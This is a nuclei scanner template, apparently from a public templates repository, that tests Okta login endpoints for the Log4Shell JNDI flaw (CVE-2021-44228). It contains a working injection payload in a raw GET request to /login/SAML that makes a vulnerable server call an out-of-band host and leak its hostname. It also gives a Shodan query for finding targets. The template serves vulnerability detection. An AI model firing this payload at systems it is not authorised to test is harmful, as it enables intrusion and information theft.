nuclei-templates/http/vulnerabilities/other/okta-log4j-rce.yaml

60 lines
2.1 KiB
YAML
Raw Normal View History

2023-10-18 20:00:15 +00:00
id: okta-log4j-rce
info:
name: Okta - Remote Code Execution (Apache Log4j)
2023-10-19 07:28:29 +00:00
author: shaikhyaser
2023-10-18 20:00:15 +00:00
severity: critical
description: |
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
reference:
- https://sec.okta.com/articles/2021/12/log4shell
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
2023-10-19 07:28:29 +00:00
shodan-query: title:"Okta"
2023-10-18 20:00:15 +00:00
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,okta,oast,kev
2023-10-19 07:28:29 +00:00
2023-10-18 20:00:15 +00:00
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
2023-10-19 07:28:29 +00:00
str: "{{rand_base(5)}}"
2023-10-18 20:00:15 +00:00
http:
- raw:
- |
2023-10-19 07:28:29 +00:00
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
2023-10-18 20:00:15 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol #Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip #Print remote interaction IP in output
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print injection point in output
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
# digest: 4a0a0047304502210090431340a59536a55281a4383528fa606363f5ea985bc145535584e32024e24c02205321b3deb485e4dfc572a542805500bbad28e5f112a2e1ea9495794d0f5cd2a7:922c64590222798bb761d5b6d8e72950